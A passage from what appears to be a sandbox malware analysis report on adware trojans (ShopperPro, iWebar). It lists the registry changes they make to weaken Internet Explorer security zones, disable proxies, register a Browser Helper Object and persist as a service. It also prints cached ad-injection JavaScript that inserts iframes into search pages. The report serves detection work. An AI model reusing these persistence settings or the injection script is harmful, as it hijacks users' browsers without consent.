    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_last_report_errors]
    "Value" = "{}"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_loader_session_page_impression]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process schtasks.exe:2756 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "47 1D C3 3A F5 F2 60 34 BE C5 7F C8 F5 35 A5 00"

    The process schtasks.exe:2784 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "D8 0C 8C A9 91 82 29 5A 52 FD 2F 8E D6 95 4C 19"

    The process schtasks.exe:2976 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "98 67 BB C4 00 57 B0 33 B2 16 EA CB 44 50 1F AC"

    The process schtasks.exe:1864 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "56 BC 9A 50 9A A1 94 E8 5A 1C 9A 39 B9 DA 08 D1"

    The process bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-4.exe:4020 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "A5 3A BD F0 41 D5 84 69 0A A8 88 26 1F 8F A5 D0"

    The process sm.exe:2844 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "FC 41 E5 29 06 D1 42 B8 53 18 E2 B2 96 0A 4B D7"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search module]
    "DisplayIcon" = "%Program Files%\Common Files\Goobzo\GBUpdate\un_smw.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common Documents" = "%Documents and Settings%\All Users\Documents"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search module]
    "Publisher" = "Search Module"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Desktop" = "%Documents and Settings%\%current user%\Desktop"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
    "sc.exe" = "A tool to aid in developing services for WindowsNT"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search module]
    "DisplayName" = "Search module"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common Desktop" = "%Documents and Settings%\All Users\Desktop"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search module]
    "UninstallString" = "%Program Files%\Common Files\Goobzo\GBUpdate\un_smw.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Personal" = "%Documents and Settings%\%current user%\My Documents"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
    "(Default)" = "\smu.exe"

    The following service will be launched automatically at system boot up:

    [HKLM\System\CurrentControlSet\Services\SMUpd]
    "Start" = "2"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The process ShopperPro.exe:2564 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
    "regsvr32.exe" = "Microsoft(C) Register Server"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\ShopperPro]
    "ExeLocation" = "%Program Files%\ShopperPro"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID]
    "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\ShopperPro]
    "ChromeExtID" = "ojhagnahfpegocdhlopgljpaafeogmcc"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKLM\SOFTWARE\ShopperPro]
    "CONFIGLOCATION" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

    "DBLocation" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    "Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\ShopperPro]
    "Aff" = "limyu"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKLM\SOFTWARE\ShopperPro]
    "Version" = "1.0.4.3"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\ShopperPro]
    "ChromeExtFile" = "ShopperPro.crx"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "48 BB E1 C5 23 E2 EE 0D 44 77 C8 4A 4C 4E 22 06"

    [HKLM\SOFTWARE\ShopperPro]
    "UserId" = "74261409-fb54-436c-b597-1b09ef03540d"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
    "(Default)" = "ShopperProBHO"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
    "NoExplore" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process 34d16228-9e90-4879-9804-8e38b5180d78-2.exe:3468 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "B1 6F 58 79 00 AD 87 4C D7 96 ED E7 BD 92 51 07"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D168E619-1E02-4536-9C33-2758BC6485BF}]
    "AppPath" = "%Program Files%\iWebar"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BF909CE8-4DE9-449F-8CEE-2BEE59CB7814}]
    "AppName" = "34d16228-9e90-4879-9804-8e38b5180d78-2.exe-buttonutil64.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D168E619-1E02-4536-9C33-2758BC6485BF}]
    "AppName" = "34d16228-9e90-4879-9804-8e38b5180d78-2.exe-helper.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{55B4690A-4825-4231-A491-14229F2ACB1C}]
    "AppName" = "34d16228-9e90-4879-9804-8e38b5180d78-2.exe-buttonutil.exe"
    "Policy" = "3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
    "{11111111-1111-1111-1111-110311551110}" = "1"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D168E619-1E02-4536-9C33-2758BC6485BF}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9055CAF7-61E0-485A-A62C-E3BA8E8146D0}]
    "AppName" = "34d16228-9e90-4879-9804-8e38b5180d78-2.exe-codedownloader.exe"
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
    "{11111111-1111-1111-1111-110311551110}" = ""

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{55B4690A-4825-4231-A491-14229F2ACB1C}]
    "AppPath" = "%Program Files%\iWebar"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BF909CE8-4DE9-449F-8CEE-2BEE59CB7814}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9055CAF7-61E0-485A-A62C-E3BA8E8146D0}]
    "AppPath" = "%Program Files%\iWebar"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BF909CE8-4DE9-449F-8CEE-2BEE59CB7814}]
    "AppPath" = "%Program Files%\iWebar"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
    "Timestamp"

    The process iwebar-bg.exe:296 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_534129]
    "Value" = "/*! Cookies.js - 0.3.1; Copyright (c) 2013, Scott Hamper; http://www.opensource.org/licenses/MIT */\n(function(n){\use strict\;var t=function(n,i,r){return 1===arguments.length?t.get(n):t.set(n,i,r)};t._document=document;t._navigator=navigator;t.defaults={path:\/\};t.get=function(n){return t._cachedDocumentCookie!==t._document.cookie&&t._renewCache(),t._cache[n]};t.set=function(i,r,u){return u=t._getExtendedOptions(u),u.expires=t._getExpiresDate(r===n?-1:u.expires),t._document.cookie=t._generateCookieString(i,r,u),t};t.expire=function(i,r){return t.set(i,n,r)};t._getExtendedOptions=function(i){return{path:i&&i.path||t.defaults.path,domain:i&&i.domain||t.defaults.domain,expires:i&&i.expires||t.defaults.expires,secure:i&&i.secure!==n?i.secure:t.defaults.secure}};t._isValidDate=function(n){return\[object Date]\===Object.prototype.toString.call(n)&&!isNaN(n.getTime())};t._getExpiresDate=function(n,i){i=i||new Date;switch(typeof n){case\number\:n=new Date(i.getTime() 1e3*n);break;case\string\:n=new Dateny"

    [HKCU\Software\iWebar\Db\Internal\Resources_queue]
    "Value" = "{""handlebars.js"":{""id"":183015,""ver"":2,""status"":1,""name"":""handlebars.js""

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_483925]
    "Expiration" = "1409684195"

    [HKCU\Software\iWebar\Db\Internal\Resources_appVer]
    "Value" = "278"

    [HKCU\Software\iWebar\Db\Internal\Resources_nextCheck]
    "Value" = "true"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_lastUpdate]
    "Expiration" = "1717268200"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_monetization_plugins_ids]
    "Value" = "[93,102,104,223]"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_376579]
    "Expiration" = "1409684195"

    [HKCU\Software\iWebar\Db\Internal\monetization_plugin_bundledUrls]
    "Expiration" = "1896127200"

    [HKCU\Software\iWebar\Db\Internal\monetization_plugin_notBundledArr_]
    "Value" = "[]"

    [HKCU\Software\iWebar\Db\Internal\Resources_appVer]
    "Expiration" = "1896127200"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_646958]
    "Expiration" = "1409684195"

    [HKCU\Software\iWebar\Db\Internal\monetization_plugin_bundledUrls]
    "Value" = "{""dealply_s"":{""urls"":[""ssfiles.com""]},""dealply_p"":{""urls"":[""i_crdrjs_info""

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 2E 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\iWebar\Db\Internal\monitor.onBeforeNavigate]
    "Expiration" = "1896127200"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_183015]
    "Expiration" = "1409684195"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_plugins_version_]
    "Value" = "10"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_override_verticals]
    "Expiration" = "1717268200"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_last_report_errors]
    "Value" = "{}"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_is_install_reported_]
    "Expiration" = "1717268200"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_353991]
    "Value" = "function md5cycle(x, k) {\nvar a = x[0], b = x[1], c = x[2], d = x[3];\n\na = ff(a, b, c, d, k[0], 7, -680876936);\nd = ff(d, a, b, c, k[1], 12, -389564586);\nc = ff(c, d, a, b, k[2], 17, 606105819);\nb = ff(b, c, d, a, k[3], 22, -1044525330);\na = ff(a, b, c, d, k[4], 7, -176418897);\nd = ff(d, a, b, c, k[5], 12, 1200080426);\nc = ff(c, d, a, b, k[6], 17, -1473231341);\nb = ff(b, c, d, a, k[7], 22, -45705983);\na = ff(a, b, c, d, k[8], 7, 1770035416);\nd = ff(d, a, b, c, k[9], 12, -1958414417);\nc = ff(c, d, a, b, k[10], 17, -42063);\nb = ff(b, c, d, a, k[11], 22, -1990404162);\na = ff(a, b, c, d, k[12], 7, 1804603682);\nd = ff(d, a, b, c, k[13], 12, -40341101);\nc = ff(c, d, a, b, k[14], 17, -1502002290);\nb = ff(b, c, d, a, k[15], 22, 1236535329);\n\na = gg(a, b, c, d, k[1], 5, -165796510);\nd = gg(d, a, b, c, k[6], 9, -1069501632);\nc = gg(c, d, a, b, k[11], 14, 643717713);\nb = gg(b, c, d, a, k[0], 20, -373897302);\na = gg(a, b, c, d, k[5], 5, -701558691);\nd = gg(d, a, b, c, k[10], 9, 38016083);1z"

    [HKCU\Software\iWebar\Db\Internal\monitor.onRedirect]
    "Value" = "false"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Personal" = "%Documents and Settings%\%current user%\My Documents"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_646958]
    "Value" = "function startAskCom(e,t,r){function n(e){var t=new RegExp(\^http[s]?://(.*?[.])?\ e.replace(\.\,\[.]\).replace(\*\,\(.*?)\) \/.*?$\,\i\);return location.href.match(t)}function o(e){if(--e<=0)return void m.send(\ElementFound\,d \:\ n);var t=null,r=!1;switch(d){case s.Default:if(t=document.getElementById(\main\)||document.getElementById(\rightblock\)){var n=\main\===t.id?i.Home:i.Search;c(t,n),r=!0}break;case s.Search:if(t=document.getElementById(\searchArea\)||document.getElementById(\rightRail\)){var n=\searchArea\===t.id?i.Home:i.Search;a(t,n),r=!0}}r?m.send(\ElementFound\,d \:\ n):setTimeout(function(){o(e)},10)}function a(e,t){switch(t){case i.Home:var r=document.createElement(\iframe\);r.src=\http://ib.adnxs.com/tt?id=2704124&referrer=site101\,r.style.cssText=\width: 740px; height: 110px; border: 0; position: absolute; top: -75px; left: -31px;\,e.insertBefore(r,e.children[0]);break;case i.Search:var r=document.createElement(\iframe\);r.src=\http://ib.adnxs.com/z"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\iWebar\Db\Internal\monitor.onRequest]
    "Expiration" = "1896127200"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_is_install_reported_]
    "Value" = "true"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_353989]
    "Expiration" = "1409684195"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "38 9C DA CB BA E0 6D 85 B5 A9 12 EB 02 90 C6 C2"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_plugins_version_]
    "Expiration" = "1717268200"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_monetization_plugins_delay]
    "Value" = "{93:0,102:0,104:0,223:0}"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_196378]
    "Value" = "/*\r\n@desc\r\n\tBase64 encoder and decoder write by JavaScript. This code was a plugin of \r\n\tjQeury, you must load jQuery library first if you want to use this code.\r\n\t - After encode, you can decode it with PHP, and vice versa\r\n\t - Support Unicode library, but only worked on chinese\r\n\tThis code was collected from the network, I just rewrite it as the plugin \r\n\tof jQuery, the copyright belongs to original work(s).\r\n\r\n@Version\t1.1 build 20110323\r\n@Author\tHpyer \r\n@Home\thttp://hpyer.cn/codes/jquery-plugin-base64-encode-and-decode\r\n@Usage\r\n\tUse UNICODE library or not: $.base64.is_unicode = false/true;\r\n\tEncode: $.base64.encode('$.base64');\r\n\tDecode: $.base64.decode('JC5iYXNlNjQ=');\r\n@License\tFree\r\n*/\r\n\r\njQuery.base64 = {\r\n\tis_unicode: false,\r\n\r\n\tencode: function(input){\r\n\t\tif (this.is_unicode) input = this._u2a(input);\r\n\t\tvar output = '';\r\n\t\tvar chr1, chr2, chr3 = '';\r\n\t\tvar enc1, enc2, enc3, enc4 = '';\r\n\t\tvar i = 0;\r\n\nz"

    [HKCU\Software\iWebar\Db\Internal\Resources_lastVersion]
    "Value" = "27"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_353991]
    "Expiration" = "1409684195"

    [HKCU\Software\iWebar\Db\Internal\Resources_nextCheck]
    "Expiration" = "1401929798"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_483925]
    "Value" = "var jw_urls2 = new Array(\a4483f3571af539b3d4f849de0f1a276\,\f8df02b0c6bb8b6368d104df4d75eb11\,\32c9bf96d13d06849466919d5e7edf17\,\382f59fc9f3ee95e14660f1656d60783\,\bcd1c805229598c9366fa359bbbf3728\,\58ef62e6da1ae779b90829cedbfac17c\,\0e7f780f4a571653fc9ed66c3c71b590\,\5f75433fe96278ee7e2420abfc9fb45c\,\41b4b767f71d874b108d2975c298f2d8\,\b30182ad9822ad406849cb17b3240ad6\,\3d357fe6a6b527b49fec7df3aae12a6d\,\2c4f8e1a32ffb88270698737c79aa935\,\c8c8faaf80086b914a50edbdd836235c\,\c81bec5a50a9a909c5c4e0cafdd03786\,\231f1df6288847fdde46b01cd7926716\,\ee414a1443e6854eb536b340e4ac023d\,\8c650eb848c533ab875087def0ec6f9c\,\7d6b534a613595428914a8b6cda31250\,\5013d1a745efa85bf1d0ff087c8e18b1\,\0a66b5fdd175b7a31cc5abb4d8d379a1\,\6d3aab5c309bab4a9ac829e6ef3610bd\,\5df06043bc624d102347821ea3e12720\,\64a0d734a39ec96e642353b59d05647e\,\894ee808b44cffbc64db6c54e4a18277\,\2f9598c6604bec8074a87e15fcd18653\,\30eb7a7b81a0bc6d9006688c091bf465\,\ec2446ec56638fb706a9dd6a3a9a45f1\\z"

    [HKCU\Software\iWebar\Db\Internal\monitor.onRedirect]
    "Expiration" = "1896127200"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_monetization_plugins_ids]
    "Expiration" = "1717268200"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_firstRun]
    "Expiration" = "1717268200"

    [HKCU\Software\iWebar\Db\Internal\Resources_meta]
    "Value" = "{""handlebars.js"":{""id"":183015,""ver"":2,""status"":1,""name"":""handlebars.js""

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_monetization_plugins_delay]
    "Expiration" = "1717268200"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_483924]
    "Value" = "var jw_urls1 = new Array(\e3f5100aa9f16c20781116530f87f423\,\d41d8cd98f00b204e9800998ecf8427e\,\ac58731ec13b030d1cb332c90dcbfaa6\,\fc4c97b239e7adc7d4aa444e2d5f00f2\,\be5cfcabaab26825d87656244d9687ba\,\812a1252bf0e053230f06d41692c9fc3\,\2c4a09692bc42b2def1b614e3d3a5c20\,\98336892d14e297c55115b0dc6311fe6\,\7920eb00f1d91148dbd988c37fcd7d23\,\d7607304c8de1b93e0c50fc21fdc247a\,\9adcb166bad34e210b4033503a770d31\,\33a9ec8354e0b03b3a60434b7746bf2c\,\4806bcd645f97a8d662480f9399aa433\,\a1efdc6b73ad34cc87e9da23fb3efeb7\,\3a4873dd29a3085268d8e2c04e989c9d\,\e7ed602fde3a560cc771eaa1d06026bc\,\8d521e07c74fcc12c758a49e317ce056\,\1d7b79ab01c5defd8d821f665957a247\,\ea9426d1cce43191d48b6e09c1000a26\,\a83c3d13d75e17d48873fc88c838daf8\,\88db5ef5ed2907954ca418ba298e924c\,\33e800638f7d3739c52184568e367293\,\d1622c082893c4abf035fd1e8acf2f9e\,\e965833d0b2dcd332c3a5db27256332c\,\3b1ae426137c8ba147dea7253b4291cb\,\785811245e95fc9a2342431d9cb7dc9d\,\accd31c1226237274c2b805622bae4f8\Rz"

    [HKCU\Software\iWebar\Db\Internal\Resources_lastVersion]
    "Expiration" = "1896127200"

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_353990]
    "Expiration" = "1409684195"

    [HKCU\Software\iWebar\Db\Internal\Resources_queue]
    "Expiration" = "1896127200"

    [HKCU\Software\iWebar\Db\Async-Internal\monetization_plugin_firstRun]
    "Value" = "false"

    [HKCU\Software\Crossrider\onBeforeNavigate]
    "35510" = ""

    [HKCU\Software\iWebar\Db\Internal\Resources_resource_353990]
    "Value" = "var jw_urls = new 